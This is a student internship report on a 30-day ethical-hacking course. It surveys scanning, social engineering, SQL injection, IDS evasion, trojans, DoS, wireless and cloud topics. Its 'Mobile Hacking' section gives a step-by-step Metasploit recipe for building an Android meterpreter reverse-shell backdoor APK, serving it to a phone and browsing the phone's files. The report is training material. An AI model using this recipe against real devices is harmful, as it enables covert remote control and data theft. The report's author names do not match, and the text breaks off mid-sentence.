CYBER SECURITY ESSENTIALS

This internship report submitted in partial fulfillment

Of the requirement for the award of degree
Of
BACHELOR OF TECHNOLOGY
In
Computer Science Engineering
By
Harika kandregula
171801120010
Under the esteemed Guidance of

DEPARTMENT OF COMPUTER SCIENCE ENGINEERING

CENTURION UNIVERSITY OF TECHNOLOGY
AND MANAGEMENT

VISAKHAPATNAM-530045
2020-21
 Declaration

I B. Akshay Kumar student of Vlll Semester B.Tech in the department of Computer Science
Engineering DEPARTMENT, Centurion University of Technology and Management (CUTMAP)
declare that the internship entitled (Vulnerability Assessment & Penetration Testing and Web
Application Penetration Testing) has been carried out by me in Star Computers Visakhapatnam during
15th may, 2019 to 15th June, 2019. This report is being submitted for the fulfillment of my internship and
for record purposes.

Place: Signature

Date: ___________
 ACKNOWLEDGEMENTS

With great solemnity and sincerity, I offer my profuse thanks to CUTM management for
providing all the resources to complete our Internship successfully.
I am extremely grateful to my Technical specialist Mr.Anand Kethavarapu and I wish to
express my whole hearted gratitude to my Internship guide.
I owe particular debt of gratitude to Prof A.Avinash, Head of Department of Computer Science
Engineering for providing all facilities required for the internship.
I thank Prof. Dr.P.S.VRamana Rao, Dean, CUTMAP for extending his outmost support and
cooperation in providing all the provisions for the successful completion of the project.

Regards,
B. Akshay Kumar
COMPANY INTRODUCTION:

STAR COMPUTERS is a leading Training Center and Provides various range of

Certifications. Located at Seethammadhara Visakhapatnam, Andhra Pradesh, India.

About STAR Computers:

STAR Computers with its foundation pillars as Innovation, Information and
Intelligence is exploring indefinitely as a Training Organization.

You may visit us at:

https://star-computers-networking-training-institute.business.site/

Highlights
Teaching by 20 years Technically & Industry Experienced faculty

Extra and well facilitated Lab

Regular Classes of Theory/Practical

Very low and economical Fee Structure

Course Material and Training completion Certificate

Duration of Course: 30days

Audio/Video Multimedia Classes facility for easier understanding

TRAINING:

This class will immerse the student into an interactive environment where they will be shown
how to scan, test, hack and secure their own systems The lab intensive environment gives each
student in-depth knowledge and practical experience with the current essential security systems
Students will begin by understanding how perimeter defenses work and then be lead into
scanning and attacking their own networks, no real network is harmed. Students then learn how
intruders escalate privileges and what steps can be taken to secure a system Students will also
learn about intrusion Detection, Policy Creation Social Engineering DDoS Attacks, Buffer
Overflows and Virus Creation. When a student leaves this intensive 30 days class, they will have
hands on understanding and experience in Ethical Hacking.
 Abstract

I had carried out my internship in Cyber Security Essentials at STAR

Computers under the guidance of Mr.Anand Kethavarapu In this report, I had
included the topics which I have learned at STAR Computers during my Cyber
Security Essentials internship under the domain of Cybersecurity.
Starting from the definition of hacking and cybersecurity I had stated many
topics like phases of hacking, methods of hacking, types of hackers, working
with the environment of windows and Kali Linux, tools that are widely used for
penetration in kali Linux, social engineering steganography, vulnerabilities,
proxy chains, cross-site scripting.
I had prepared this report after working practically with all the tools I had
mentioned and I also presented a theory about a few topics up to my knowledge.
I conclude through this internship report that I want to present the knowledge
which I gained during the internship.
 CONTENTS
1. Introduction to Ethical Hacking
2. Scanning Networks
3. System Hacking
4. Viruses and Worms
5. Social Engineering
6. Hacking Web Servers
7. SQL Injections
8. Evading IDS, Firewalls and Honeypots
9. Cryptography
10.Mobile Hacking
11.Foot printing and Reconnaissance
12.Enumeration
13.Trojans and Backdoors
14.Sniffers
15.Denial of Service
16.Hacking Web Applications
17.Hacking Wireless Networks
18.Buffer Overflows
19.Penetration Testing
20.Understanding cloud

1. INTRODUCTION:
Cyber security is the process of protecting and recovering networks, devices and programs
from any type of cyber-attacks, as well as from the disruption or misdirection of the attacker.
It is the body of technologies and modification or unauthorized access. It is also referred to as
Information Security.

2. SCANNING NETWORKS:
Network Scanning is the procedure of identifying active hosts, ports and the services used by
the target application. Suppose you are an Ethical Hacker and want to find vulnerabilities in
the System, you need a point in the System that you can try to attack. Network Scanning for
Ethical Hacking is used to find out these points in the system that a Black Hat Hacker can use
to hack the network. And then the respective teams work on improving the security of the
network. Every Organization has a Network. This network could be an internal network
which consists of all the systems connected with each other, or it can be a network that’s
connected to the internet. In either case, to hack the network, you will have to find a
vulnerable point in the network that can be exploited. Network Scanning is used to find out
such points in the network.

3. SYSTEM HACKING:
System hacking is defined as the compromise of computer systems and software to access the
target computer and steal or misuse their sensitive information. Here the malicious hacker
exploits the weaknesses in a computer system or network to gain unauthorized access to its
data or take illegal advantage.
A hacker can hack the computer system because the hacker knows the actual work of
computer systems and software inside the system. For this, a hacker has information about
the systems, networking, and knowledge of other areas related to computer science. Anyone
who is using a computer and is connected to the internet is susceptible to malicious hackers'
threats. These online villains generally use viruses, malware, Trojans, worms, phishing
techniques, email spamming, social engineering, exploit operating system vulnerabilities, or
port vulnerabilities to access any victim's system.

4. VIRUSES AND WORMS:

Viruses and worms are malicious programs that self-replicate on computers or via computer
networks without the user being aware; each subsequent copy of such malicious programs is
also able to self-replicate. Malicious programs which spread via networks or infect remote
machines when commanded to do so by the “owner” (e.g. Backdoors) or programs that create
multiple copies that are unable to self-replicate are not part of the Viruses and Worms
subclass. The main characteristic used to determine whether or not a program is classified as
a separate behaviour within the Viruses and Worm’s subclass is how the program propagates
(i.e. how the malicious program spreads copies of itself via local or network resources.)
Most known worms are spread as files sent as email attachments, via a link to a web or FTP
resource, via a link sent in an ICQ or IRC message, via P2P file sharing networks etc.

Some worms spread as network packets; these directly penetrate the computer memory, and
the worm code is then activated. Worms use the following techniques to penetrate remote
computers and launch copies of themselves: social engineering (for example, an email
message suggesting the user opens an attached file), exploiting network configuration errors
(such as copying to a fully accessible disk), and exploiting loopholes in operating system and
application security.
Viruses can be divided in accordance with the method used to infect a computer:
File viruses
Boot sector viruses
Macro viruses
Script viruses
Any program within this subclass can have additional Trojan functions. It should also be
noted that many worms use more than one method in order to spread copies via networks.
The rules for classifying detected objects with multiple functions should be used to classify
these types of worms.
This subclass of malicious programs includes the following behaviours:
Email-Worm
IM-Worm
IRC-Worm
Net-Worm
P2P-Worm
Virus
Worm

5. SOCIAL ENGINEERING:
Social engineering is the act of tricking someone into divulging information or taking action,
usually through technology. The idea behind social engineering is to take advantage of a
potential victim’s natural tendencies and emotional reactions.
TYPES:
Phishing
Spear phishing
Vishing
Pretexting
Baiting
5.1. PHISHING:
Phishing is used to steal user data including login credentials and credit card numbers. It
occurs when an attacker is a trusted entity.
FIG: 5.1

FIG: 5.2
FIG: 5.3

FIG: 5.4
 FIG: 5.5
6. HACKING WEBSERVERS:

A web server is a program that stores files (usually web pages) and makes them accessible
via the network or the internet. A web server requires both hardware and software. Attackers
usually target the exploits in the software to gain authorized entry to the server. Let’s look at
some of the common vulnerabilities that attackers take advantage of.

 Default settings– These settings such as default user id and passwords can be easily
guessed by the attackers. Default settings might also allow performing certain tasks
such as running commands on the server which can be exploited.
 Misconfiguration of operating systems and networks – certain configuration such
as allowing users to execute commands on the server can be dangerous if the user
does not have a good password.
 Bugs in the operating system and web servers– discovered bugs in the operating
system or web server software can also be exploited to gain unauthorized access to the
system.

7. SQL INJECTION:
SQL injection is a set of SQL commands that are placed in a URL string or in data structures
in order to retrieve a response that we want from the databases that are connected with the
web applications. This type of attacks generally takes place on webpages developed using
PHP or ASP.NET.
An SQL injection attack can be done with the following intentions −
 To dump the whole database of a system,
 To modify the content of the databases, or
 To perform different queries that are not allowed by the application.
This type of attack works when the applications don’t validate the inputs properly, before
passing them to an SQL statement. Injections are normally placed put in address bars, search
fields, or data fields.
The easiest way to detect if a web application is vulnerable to an SQL injection attack is to
use the " ‘ " character in a string and see if you get any error.

FIG: 7.1

8. EVADING IDS, FIREWALLS AND HONEYPOTS:

EVADING IDS:
Intrusion Detection System Acting as a passive technique, intrusion detection is a critical part
of network monitoring. It will only inform when an event has occurred but does not prevent
or correct the situation by default. On the other hand, intrusion prevention systems perform
on an active level. Sometimes using false positives turning these systems against the owners,
this configuration and testing actively seeks out anything considered abnormal.
There are several approaches to intrusion detection. Here are seven of the most common:
Signature Recognition
Anomaly Detection
Statistical Detection
Network-Based Intrusion Detection
Host-Based Intrusion Detection
Log File Monitoring
File Integrity Checking
Signature Recognition - Signatures are primarily recognizable characters of a packet such as
a particular series of bytes or characters. The position, or offset of particular bytes can be of
significance as well as specified fields values or protocol flag combinations. Signal detection
occurs in real time. After a suspect packet is detected, alerts can be placed in a log file almost
immediately. If in place, an Incident Response Plan is activated and notifications can be sent.
All of this is most often the greatest weakness of an IDS implementation. This weakness is
because by the time the attack is noticed, the objective may have already been met and the
attacker might be gone or at least changed the nature of their presence. Should the IDS be
running in "in-line" mode, it could interact with firewall software to implement new policy
rules to block the attack. This is the function of an Intrusion Prevention System (IPS).There is
a drawback to signature detection and this is in the complexity and of the amount of the rule
set that must be used. With it having to be constantly updated, it will not detect zero-day
exploits, which are exploits that there are no signature rules yet available.
Anomaly Detection - Unusual events are what this type of IDS looks for. This means that it
is critical to have a knowledge of what traffic is considered "normal." A baseline metric is
needed and normal, expected traffic is given to the IDS. The IDS then will provide an alert if
events other than what the baseline predicts take place. This type of monitoring has an
advantage as to where certain types of attacks that would normally evade signature analysis
would be detected. Some of these attacks would be ARP poisoning or heavily fragmented
packets that would cause unusual traffic. The disadvantage is that this IDS is only as good as
its baseline.
Statistical Detection - This IDS notices attacks that occur over time. Should an attacker try
and scan very slowly, alerts are still triggered. Analysis, however, takes time and the attack
may not be discovered until they have been completed, however at least the target will know
the event has happened.
Network-Based Intrusion Detection - Considered "passive", this IDS just listens on the
wire. Any form of analysis can be used.
Host-Based Intrusion Detection - This IDS is considered active since it can be invasive in
order to monitor the behavior or actions of a host. As an example, if multiple emails are sent
without a subject or content, the HIDS will block all email activity, notify the user and have
the user confirm whether the actions were intended or not.
Log File Monitoring - Since log files have thousands of formats and each one is unique to
the service that is being monitored, they present a challenge to analyze. Commercial tools are
available that know of many popular formats and thus make reporting much easier, and they
can provide real-time reporting as well.
File Integrity Checking - The class of IDS that keeps a database of hashes computed from
critical files or directories on the system is the System Integrity Verifier (SIV). It recalculates
these hashes either periodically or whenever the file is accessed. It then presents an alert
when changes have been detected.SIVs discover files that have been replaced, altered or
corrupted. Unfortunately, files that change often are much more difficult to monitor.
Fortunately, OS system files and program libraries are not subject to frequent changes and a
new hash database must be computed after accepting patches or other security updates.
FIREWALLS:

Firewalls can be either software based or hardware devices that are used in the enforcement
of security policies. Both can filter traffic based on a set of rules as traffic passes through
them. Routers are not firewalls and should never be considered as such. Network based
firewalls will route traffic but this is only if the policy allows. Single hosts can be protected
from both incoming and outgoing traffic by use of a host based firewall. Regardless of
whether the firewall is software or hardware, all can create a troubleshooting nightmare
should they not be configured carefully or correctly. This is the keystone to a business
objective driven policy when it comes to firewall configuration.

Improvised configurations do not work well with firewalls. The configurations must be
carefully thought through and any impact caused by the configuration must be considered.
This should be done before the implementation of any firewall policies. Physical or social
engineering attacks cannot be protected against by any firewall. The most common
weaknesses in any firewall are either leaving them in their default configurations or by
careless implementation. Attackers are looking hard for these weaknesses and the best
defensive measure it to prevent them from finding them by changing the default settings or
by careful firewall configurations. Of equal importance is to understand both the benefits and
the limitations of firewalls and prevent being lulled into the false sense of security by
thinking their mere presence is equal to network security and protection.

Firewall Classes
Different types of firewalls exist each having their own niche in the market. Some products
are multi-functional providing features such as routing and Demilitarized Zones (DMZ).
These are the four common firewall classes:

 Packet Filters
 Circuit Level Gateways
 Application Level Firewalls
 Stateful Multilayer Inspection Firewalls

Packet Filters - Packet filters search for protocol information in the delivery and transport
layers. The idea behind this is to filter out the obvious items first. Since every packet is a
discreet single logical unit, packet filters only look at one delivery at a time. This method is
computationally cheap very efficient.

Circuit Level Gateways - Circuit Level Gateways are a unique set of firewalls that protect
the integrity of each end of the session, all without invading the confidentially of the data that
is being exchanged. It is a socket level proxy as it creates entirely new connections that are
based on the synchronizing of IP addresses and ports.
This method works by including a new translation of the sequence numbers that are tracked
by TCP to help the receiving host reassemble all of the segments of data. It also prevents
session hijacking and also helps obscure the true endpoints of any observed conversation.

Application Level Firewalls - Application Level Firewalls work on the Layer 7 level by
looking at the content of each network packet. This includes all client server requests and
information content that is delivered on the network. Application Level Firewalls are
computationally expensive as many factors ride far beyond simple a string pattern that must
be matched and incorporated. Factors also include context and policies such as user profiles
and time of day constraints. Once a policy violation is detected, there is a consideration as to
whether or not log the evidence in a forensically sound manner, to redirect the user to another
source or to log the alert allowing manual intervention in the determination as to what action
should be taken.

Stateful Multilayer Inspection Firewalls - This class of firewall is a combination of all of

the other three types of firewalls. They act by filtering packets at the network layer ridding
the easiest data first and then send the remaining packets to the deep packet
inspection engine. Deep packet inspection is a form of network packet filtering that examines
the data of a packet searching for protocol non-compliance, viruses, spam, intrusions or
defined criteria to decide whether the packet may pass or if it needs to be routed to a different
destination.

Honeypots
The Nature of Honeypots

Honeypots are designed to attract attackers with the idea that monitoring systems will allow
the attacker to be observed. Honeypots come in different scales with a honeypot being a host,
a honey net is a network and a honey token is a piece of monitored data. Before the
deployment of a honeypot, a company or organization needs to verify that they are not
violating the privacy rights of the attacker. Convert honeypots deployed by third party
projects rest in a different category.

The art to setting up a decoy victim is to make it appear legitimate. It must not stand out or
seem in any way unusual or the attacker will notice and avoid it. With this, honeypots are not
necessarily entirely exposed to risks, where a bastion host is used to describe one that is since
it is completely exposed and completely hardened because it is getting no help. Honeypots
cannot create additional risks or they could, and would be used against their attacker.
Honeypot Types
There are four different honeypot varieties that exist, all a matter of choice and a balance of
risk, accuracy and administrative distraction from the production hosts. These levels are:

 Physical Honeypots
 Virtual Honeypots
 Low Interaction
 High Interaction

Physical Honeypots - These types are considered physical tests, fully functional and heavily
monitored. They can be as simple as an unlocked bicycle leaning against a wall. Though it is
there and unsecured, this does not mean the owner has given any permissions for anyone to
take it.

Virtual Honeypots - Thus type is a sacrificial host setup on a network having real services
running on a real OS but only containing fictional information, if any at all. Though this
honeypots comes with great risk, it is the most convincing form of honeypot. This type of
honeypot will appear as a rogue infrastructure and cause internal time wasting should it not
be formalized in configuration, release and without change management processes in place.
This IDS may have been told to pass all traffic coming from the honeypot and this can be a
big mistake should the honeypot be compromised while remaining undetected. In this state, it
could be used as a weapon against the network.

Low Interaction - This form appears to an attacker as an access point. It only logs probing
activity, however, and since this host is of no production value, all access attempts are
considered suspicious.

High Interaction - This form can be of great risk. Being able to be fully compromised, it
must be separated from any network segment that has production value. The monitoring
capabilities of this type of honeypot facilitates the gathering of information that would not be
noticed by NIDS. By diligently monitoring the honeypot, detection of the larger plan of the
attacker is possible and if the attacker manages to evade the network-based intrusion
detection, hopefully the diversion will be discovered and attacked.

9. CRYTOGRAPHY:

Cryptography is a method of protecting information and communications through the use of

codes, so that only those for whom the information is intended can read and process it. The
prefix "crypt-" means "hidden" or "vault" -- and the suffix "-graph" stands for "writing."
Cryptography refers to secure information and communication techniques derived from
mathematical concepts and a set of rule-based calculations called algorithms, to transform
messages in ways that are hard to decipher. These deterministic algorithms are used for
cryptographic key generation, digital signing, verification to protect data privacy, web
browsing on the internet, and confidential communications such as credit card transactions
and email.

Cryptography techniques
Cryptography is closely related to the disciplines of cryptology and cryptanalysis. It includes
techniques such as microdots, merging words with images, and other ways to hide
information in storage or transit. However, in today's computer-centric world, cryptography
is most often associated with scrambling plaintext (ordinary text, sometimes referred to as
clear text) into cipher text (a process called encryption), then back again (known as
decryption). Individuals who practice this field are known as cryptographers.

Modern cryptography concerns itself with the following four objectives:

1. Confidentiality: the information cannot be understood by anyone for whom it was

unintended

2. Integrity: the information cannot be altered in storage or transit between sender and

intended receiver without the alteration being detected

3. Non-repudiation: the creator/sender of the information cannot deny at a later stage

his or her intentions in the creation or transmission of the information

4. Authentication: the sender and receiver can confirm each other's identity and the
origin/destination of the information
10. MOBILE HACKING:
1. a) /etc/apache2/apache2.conf # add servername localhost
b) service postgresql start
c) service metasploit start
2. #msfpayload android/meterpreter/reverse_tcp lhost=<kali ip> O R
>/root/Desktop/backdoor.apk # backdoor.apk is generated
#msfvenom –p android/meterpreter/reverse_tcp LHOST=192.168.1.201 LPORT=4444 R >
/root/Desktop/backdoor.apk
3. Sending backdoor.apk to android mobile
a) Service apache2 start
b) cd /var/www
c) mkdir html
e) cp backdoor.apk /var/www/html
e) go to android device - launch browser- www.<kali-ip>/html and download
4. on Kali launch
# msfconsol
msf>use exploit/multi/handler
handler> set payload android/meterpreter/reverse_tcp
handler> set LHOST <ip>
handler> show options
handler> exploit -j z
5. On Android phone execute backdoor.apk program
6. On kali session 1 is opened
handler> session -i 1
meterpreter> sysinfo
meterpreter>ipconfig
meterpreter> pwd
meterpreter> ls cd /sdcard
Create a test directory and download files using
meterpreter> upload <filename>
meterpreter> download <filename>

11. FOOT PRINTING AND RECONNAISSANCE:

FOOT PRINTING

Refers to the process of collecting as much as information as possible about the target system
to find ways to penetrate into the system. An Ethical hacker has to spend the majority of his
time in profiling an organization, gathering information about the host, network and people
related to the organization.

Information such as ip address, Who is records, DNS information, an operating system used,
employee email id, Phone numbers etc. is collected.
Foot printing helps to 

Know Security Posture – The data gathered will help us to get an overview of the security
posture of the company such as details about the presence of a firewall, security
configurations of applications etc.

Reduce Attack Area – Can identify a specific range of systems and concentrate on particular
targets only. This will greatly reduce the number of systems we are focusing on.

Identify vulnerabilities – we can build an information database containing the

vulnerabilities, threats, loopholes available in the system of the target organization.

Draw Network map – helps to draw a network map of the networks in the target
organization covering topology, trusted routers, presence of server and other information.

Information Gathering and getting to know the target systems is the first process in ethical
hacking. Reconnaissance is a set of processes and techniques (Footprinting, Scanning &
Enumeration) used to covertly discover and collect information about a target system.

RECONNAISSANCE:

During reconnaissance, an ethical hacker attempts to gather as much information about a

target system as possible, following the seven steps listed below −

Gather initial information

Determine the network range
Identify active machines
Discover open ports and access points
Fingerprint the operating system
Uncover services on ports
Map the network

Active Reconnaissance

In this process, you will directly interact with the computer system to gain information. This
information can be relevant and accurate. But there is a risk of getting detected if you are
planning active reconnaissance without permission. If you are detected, then system admin
can take severe action against you and trail your subsequent activities.

Passive Reconnaissance

In this process, you will not be directly connected to a computer system. This process is used
to gather essential information without ever interacting with the target systems.
 12. ENUMERATION:

Enumeration is defined as the process of extracting user names, machine names, network
resources, shares and services from a system. In this phase, the attacker creates an active
connection to the system and performs directed queries to gain more information about the
target. The gathered information is used to identify the vulnerabilities or weak points in
system security and tries to exploit in the System gaining phase.

Types of information enumerated by intruders:

 Network Resource and shares

 Users and Groups

 Routing tables

 Auditing and Service settings

 Machine names

 Applications and banners

 SNMP and DNS details

Techniques for Enumeration

 Extracting user names using email ID's

 Extract information using the default password

 Brute Force Active Directory

 Extract user names using SNMP

 Extract user groups from Windows

 Extract information using DNS Zone transfer

Services and Port to Enumerate

 TCP 53: DNS Zone transfer

 TCP 135: Microsoft RPC Endpoint Mapper

 TCP 137: NetBIOS Name Service

 TCP 139: NetBIOS session Service (SMB over NetBIOS)

 TCP 445: SMB over TCP (Direct Host)

 UDP 161: SNMP

 TCP/UDP 389: LDAP

 TCP/UDP 3368: Global Catalog Service

 TCP 25: Simple Mail Transfer Protocol (SMTP)

13. TROJANS AND BACKDOOR:

Trojans are malicious files which are used by the attacker to create a backdoor without the
knowledge of the user. It usually deletes or replaces operating system critical files, steal data,
send notifications to remote attacker, and remotely control the target. Trojans usually hide
behind a genuine code or program or file to avoid getting noted by the user. Behind the
original program, it establishes a backdoor connection with the remote attacker. It has 3 parts

1. Dropper: This is the code which installs malicious code into the target.

2. Malicious code: This is the code which exploits the system and gives the attacker
control over the target.

3. Wrapper: Wrapper wraps dropper, malicious code, genuine code into one exe
package.When victims try to download an infected file, dropper installs the malicious code
first and then the genuine program.

Purpose of Trojans

 Steal information such as passwords, security codes, credit card information using
keyloggers

 Use victim´s PC as a botnet to perform DDoS attacks

 Delete or replace OS critical files

 Generate fake traffic to create DoS

 Download spyware, adware and malware

 Record screenshots, audio and video of victim´s PC

 Disable fw and av

 Infect victim´s PC as a proxy server for relaying attacks

 Use victim´s PC as a botnet to perform DoS, spamming and blasting email messages

There are various types of Trojans like

 Hypervisior Trojan

 HTTP/HTTPS Trojan

 Remote access Trojan

 FTP Trojans

 VNC Trojans

 Banking Trojans

 DOM based Trojan

 Destructive Trojan

 Botnet Trojan

 Proxy Trojan

 Data hiding Trojan

Countermeasures:

 Avoid opening emails from unknown users

 Do not download free software’s from untrusted sites

 Always upgrade and keep firewalls, IDS and anti-virus updated with latest patches
and signatures

 Block all unnecessary ports

 Periodically check startup programs and processes running to find any malicious files
running.

BACKDOOR:

Backdoor malware is generally classified as a Trojan. A Trojan is a malicious computer

program pretending to be something it's not for the purposes of delivering malware, stealing
data, or opening up a backdoor on your system. Much like the Trojan horse of ancient Greek
literature, computer Trojans always contain a nasty surprise.
Trojans are an incredibly versatile instrument within the cybercriminal toolkit. They come
under many guises, like an email attachment or file download, and deliver any number of
malware threats.

To compound the problem, Trojans sometimes exhibit a worm-like ability to replicate

themselves and spread to other systems without any additional commands from the
cybercriminals that created them. Take, for example, the Emotet banking Trojan. Emotet got
its start in 2014 as an information stealer, spreading across devices and stealing sensitive
financial data. Since then Emotet has evolved into a delivery vehicle for other forms of
malware. Emotet helped make the Trojan the top threat detection for 2018, according to the
State of Malware report. 

14. SNIFFERS:

Sniffing is a process of monitoring and capturing all data packets passing through given
network. Sniffers are used by network/system administrator to monitor and troubleshoot
network traffic. Attackers use sniffers to capture data packets containing sensitive
information such as password, account information etc. Sniffers can be hardware or software
installed in the system. By placing a packet sniffer on a network in promiscuous mode, a
malicious intruder can capture and analyze all of the network traffic.

There are two types:

Active Sniffing:

Sniffing in the switch is active sniffing. A switch is a point to point network device. The
switch regulates the flow of data between its ports by actively monitoring the MAC address
on each port, which helps it pass data only to its intended target. In order to capture the traffic
between target sniffers has to actively inject traffic into the LAN to enable sniffing of the
traffic. This can be done in various ways.

Passive Sniffing:

This is the process of sniffing through the hub. Any traffic that is passing through the non-
switched or unbridged network segment can be seen by all machines on that segment.
Sniffers operate at the data link layer of the network. Any data sent across the LAN is
actually sent to each and every machine connected to the LAN. This is called passive since
sniffers placed by the attackers passively wait for the data to be sent and capture them.

15. DENIAL OF SERVICE:

Denial of service attack (DOS) is an attack against computer or network which reduces,
restricts or prevents accessibility of its system resources to authorized users.
Distributed Denial of Service (DDoS) attack is an attack where multiple compromised
systems simultaneously attack a single system; thereby, causing a DOS attack for the users of
the target.

An attacker can select the Zombies randomly or topologically and once compromised, he sets
up a command and controller to control the zombies that attack the target. A bot is a
malicious software installed on compromised machines, this gives the attacker control over
the zombies. The network of Bots is called botnet.

Fig: 15.1

Types of DOS:

Volumetric attacks:

This is an Attack where the entire bandwidth of a network is consumed so the authorized
clients will not be able to get the resources. This is achieved BY flooding the network devices
like hubs or switches with numerous ICMP echo request/reply packets so the entire
bandwidth is consumed, and no other clients are able to connect with the target network.

Syn flooding:

Is another attack where an attacker compromises multiple zombies and simultaneously floods
the target with multiple SYN packets. The target will be overwhelmed by the SYN requests,
either it goes down or its performance is reduced drastically.
 Fig: 15.2

Fragmentation attacks:

This is an attack that fights against the reassembling ability of the target. Numerous
fragmented packets are sent to the target, making it difficult for the target to reassemble them;
thereby, denying access to the valid clients.

TCP-State exhaustion attack:

The attacker sets up and tears down TCP connections and overwhelms the stable tables;
thereby, causing a DOS attack.

Application Layer Attacks:

The attacker takes advantage of the programming errors in the application to cause the denial
of service attack. It is achieved by sending numerous application requests to the target to
exhaust the target’s resources so it will not be able to service any valid clients. A
programming error in the case of buffer overflow attack- if the memory allocated to a
variable is smaller than the requested, then it may lead to memory leakage or crashing the
entire application.

Fig: 15.3
 Plashing:

This is done by causing a permanent damage to the system hardware by sending fraudulent
updates to the hardware thereby making them completely unusable. The only solution is to
re-install the hardware.

Counter Measures:

 Use up-to-date anti-virus and IDS tools.

 Perform network analysis to find out the possibility of DOS attack.

 Shut down unnecessary services in the target network.

 Find and neutralize handlers. Protect secondary victims.

 Perform proper activity profiling and ingress/egress filtering to filter out unwanted
traffic.

 Enforce in-depth packet Analysis.

 Use Defense-in–depth approach.

 Add additional load balancers to absorb traffic and set up a throttle logic to control
traffic.

 Correct program errors.

 Use Strong encryption mechanisms.

16. HACKING WEB APPLICATIONS:

Web application provides an interface between the web server and the client to communicate.
Web pages are generated at the server, and browsers present them at the client side. The data
is passed between client and server in the form of HTML pages through HTTP protocol.

There are client-side vulnerabilities and server-side vulnerabilities which lead to a web
application attack.

Attacks:
Parameter Tampering:

This involves modifying parameters exchanged between client and server, which may lead to
XSS attack and SQL injection attack. Usually, HTML data goes as a name-value pair; if the
attacker is able to modify the values of the parameter during transfer, it may lead to many
other attacks.
 Fig: 16.1

Unvalidated inputs:

Web applications accept user inputs, queries are constructed based on dynamic user input. If
these inputs are not properly sanitized they will open a way for the attacker to launch attacks
like XSS, SQL injection attack, Directory traversal attack, etc., identity theft, data theft are
dangerous outcomes of this attack.

Directory traversal Attack:

This is a type of vulnerability where an attacker is able to access beyond the web root
directory, into the restricted directories on the web server. Then an attacker will be able to
access system files, run OS commands, access configuration information, etc.

Fig: 16.2

17. HACKING WIRLESS NETWORK:

Wireless networks come with excellent advantages- connectivity beyond walls, wireless

connection, easy to access internet even in areas where laying cables is difficult, speed and
sharing. But, wireless networks have a few disadvantages, the major issue being- the
questionable security.
Important Terms:

Access Point: The point where the mobile device, computers connect to the wireless
network.

SSID: Service Set Identifier identifies the access point, it is a human-readable text which
when broadcasted leads to the identification of an access point.

BSSID: Mac address of the Access point.

Bandwidth: Amount of information that can be transferred over the connection.

There are various standards for wireless transmission:

Fig: 17.1

Authentication:
Open Authentication:

Fig: 17.2

When a client wants to connect to an open access point he/she sends a probe request, and the
AP sends a probe response; the client then sends an authentication request. Upon receiving a
response, the client establishes an association with the AP.
Shared Key Authentication Process:

Here, the client sends a probe request, and the access point sends the probe response; then,
the client requests for an authentication request, the AP sends an authentication challenge to
the client. The client needs to send the shared key as authentication challenge response. AP,
then, verifies the client and authenticates him/her, who then establishes a connection with the
access point.

Fig: 17.3

Centralised Authentication:

In the corporate environment, instead of an Access point verifying client’s authentication

details, a centralised server does the job of verifying the client. RADIUS is a centralised
authentication server which verifies clients who want to connect with the access point.

Fig: 17.4

18. BUFFER OVERFLOWS:

A buffer overflow is a situation where a running program attempts to write data outside the
memory buffer which is not intended to store this data. When this happens we are talking
about a buffer overflow or buffer overrun situation. A memory buffer is an area in the
computer’s memory (RAM) meant for temporarily storing data. This kind of buffers can be
found in all programs and are used to store data for input, output and processing. An example
of data stored in buffers are login credentials or the hostname for an FTP server. Also other
data temporarily stored before processing can be stored in buffers. This literally could be
anything from user input fields such as username and password fields to input files used to
import certain configuration files. When the amount of data written to the buffer exceeds the
expected amount of data, the memory buffer is overrun. This happens for example when a
username with a maximum of 8 bytes is expected and a username of 10 bytes is given and
written to the buffer. In this case the buffer is exceeded by 2 bytes and an overflow will occur
when it’s not prevented from happening. This often happens due to bad programming and the
lack of input sanitization.

Fig: 18.1
19. PENTRATION TESTING:
Penetration testing is aimed at finding vulnerabilities, malicious content, flaws, and risks.
This is done to strengthen the organization’s security system to defend the IT infrastructure.
Penetration testing is an official procedure that can be deemed helpful and not a harmful
attempt. It forms part of an ethical hacking process where it specifically focuses only on
penetrating the information system. While it is helpful in improving cybersecurity strategies,
penetration testing should be performed regularly. Malicious content is built to discover weak
points in the applications, systems or programs and keep emerging and spreading in the
network. A regular pentest may not sort out all security concerns, but it significantly
minimizes the probability of a successful attack.

A penetration test helps determine whether an IT system is vulnerable to a cyberattack,

whether the defensive measures are sufficient, and which security measure failed the test. It
shows the strengths and weaknesses of any IT infrastructure at a given point of time. The
process of penetration testing is not casual, it involves lot of planning, taking explicit
permission from the management, and then initiating tests safely without obstructing regular
work flow.

20. UNDERSTANDING CLOUD:

Cloud computing is named as such because the information being accessed is found remotely
in the cloud or a virtual space. Companies that provide cloud services enable users to store
files and applications on remote servers and then access all the data via the Internet. This
means the user is not required to be in a specific place to gain access to it, allowing the user
to work remotely.

Cloud computing takes all the heavy lifting involved in crunching and processing data away
from the device you carry around or sit and work at. It also moves all of that work to huge
computer clusters far away in cyberspace. The Internet becomes the cloud, and voilà—your
data, work, and applications are available from any device with which you can connect to the
Internet, anywhere in the world.

Cloud computing can be both public and private. Public cloud services provide their services
over the Internet for a fee. Private cloud services, on the other hand, only provide services to
a certain number of people. These services are a system of networks that supply hosted
services. There is also a hybrid option, which combines elements of both the public and
private services.

Types of Cloud Services

Regardless of the kind of service, cloud computing services provide users with a series of
functions including:

 Email
 Storage, backup, and data retrieval
 Creating and testing apps
 Analyzing data
 Audio and video streaming
 Delivering software on demand

Cloud computing is still a fairly new service but is being used by a number of different
organizations from big corporations to small businesses, nonprofits to government agencies,
and even individual consumers.

Deployment Models
There are various types of clouds, each of which is different from the other. Public clouds
provide their services on servers and storage on the Internet. These are operated by third-
party companies, who handle and control all the hardware, software, and the general
infrastructure. Clients access services through accounts that can be accessed by just about
anyone.

Private clouds are reserved for specific clientele, usually one business or organization. The
firm's data service center may host the cloud computing service. Many private cloud
computing services are provided on a private network.

Hybrid clouds are, as the name implies, a combination of both public and private services.
This type of model allows the user more flexibility and helps optimize the user's
infrastructure and security.
Types of Cloud Computing
Cloud computing is not a single piece of technology like a microchip or a cellphone. Rather,
it's a system primarily comprised of three services: software-as-a-service (SaaS),
infrastructure-as-a-service (IaaS), and platform-as-a-service (PaaS).

1. Software-as-a-service (SaaS) involves the licensure of a software application to

customers. Licenses are typically provided through a pay-as-you-go model or on-
demand. This type of system can be found in Microsoft Office's 365.1
2. Infrastructure-as-a-service (IaaS) involves a method for delivering everything from
operating systems to servers and storage through IP-based connectivity as part of an
on-demand service. Clients can avoid the need to purchase software or servers, and
instead procure these resources in an outsourced, on-demand service. Popular
examples of the IaaS system include IBM Cloud and Microsoft Azure.2  3
3. Platform-as-a-service (PaaS) is considered the most complex of the three layers of
